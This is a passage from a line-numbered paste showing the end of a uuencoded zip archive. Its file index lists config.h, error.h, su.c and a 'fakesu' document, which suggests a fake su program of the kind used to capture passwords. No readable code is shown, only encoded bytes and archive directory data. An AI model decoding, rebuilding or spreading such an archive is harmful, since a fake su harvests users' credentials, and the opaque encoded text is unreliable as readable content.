  12214. M$_]"?!7QR,B6;Z36*[[S9>JR'&WUF<;Q+_55"G)6MS=^/"WG!F&R/)0;/%B_
  12215. MDELMW'TY3">G>UH.TRH*]N6Z_6]MY[1<H%YPC/;D!N->ZU=Y24+O("_#@=5J
  12216. MGY8K[L=6SIS`TW*F@^S+?;^S[^U?./K3EW-YX*D1G'3[+:O["X<+XOPN()4D
  12217. M%!(:/[_'4LL]=55N&NC+R"SZ+WI-C6QN*]'<H+>I,%V?JPJ3,0FY7YG70O$-
  12218. MOPHR@R94<<J7/^>65]]HPRSF*80!D(TEP9W-->_,C*5DR:_ZQ$\T24Q\A?E4
  12219. ME$7'E1[&++"`B]&=ZATH+7]2L]&XK%_4FM?7%Z31#LWKK_I5_:+>I)6+GG_5
  12220. MP-0-,>Z:5U>_U_#U*04+&P1A($:I4=J.JM)UR2`)DT>-&3TP,W.;R5CMY0\Q
  12221. M!T+K]&T?O)7+%08C#SNP,F+F`10H!"!*NO`ZDV?)W\9**7TWQG!D\RYKH=#1
  12222. M?06_.;<\_E6T9(4F[!0U[U5'VNPV&U`Q%5$SH6'>75<*-YS)(,76`Z<_ZG,1
  12223. M,2#=="T\+5O17%>(OQE*ITWM\'FYD@/M_*8P<H%Q/,X@XNMUARBB&'NF<Z2?
  12224. M0M@T>;L8-LU2`:>:2V-Z*VB/4HF\OVJ^E+%`N852F@/[5ZEK".8.R5-];?*4
  12225. MSQIJ]ZQ;6(5?!;MO`<"E0<]O<^V3\@A3N<)#.L8/2I?;'I^^=8*8ST]]M<00
  12226. MSH5WZ>4[\U^5[F2$&H6C>PYFVE[3=*!E7W3/7?[>1/Q_4$L!`A4#%`````@`
  12227. M+R)$(G7:3PX=#```.3````@`#````````0``0*2!`````&-O;F9I9RYH55@(
  12228. M`).C^#*Z#/<R4$L!`A4#%`````@`\WM%(H>YN^Z.!```M`D```<`#```````
  12229. M`0``0*2!4PP``&5R<F]R+FA56`@`IJ/X,CG\^#)02P$"%0,4````"`"Z3$4B
  12230. MU8;>3X("``#.!```"@`,```````!``!`I($6$0``9F%K97-U+F1O8U58"`!/
  12231. MJ?@R3ZGX,E!+`0(5`Q0````(`.-[12*[JQGC(@@``$X6```,``P```````$`
  12232. M`$"D@=`3``!L:6)G971T97AT+FA56`@`NZ/X,AG\^#)02P$"%0,4````"`#H
  12233. M>T4BNZL9XR((``!.%@``"0`,```````!``!`I($L'```;&EB:6YT;"YH55@(
  12234. M`,RC^#(C_/@R4$L!`A4#%`````@`(7Q%(CD1D)-P!P``5A(```0`#```````
  12235. M`0``0*2!A20``'-U+F-56`@`WJ/X,H[\^#)02P$"%0,4````"``[?$4B?@._
  12236. M]#0)``!/%P``"``,```````!``!`I($G+```<WES=&5M+FA56`@`[:/X,L+\
  12237. 8^#)02P4&``````<`!P#0`0``D34`````
  12238. `
  12239. end
  12240.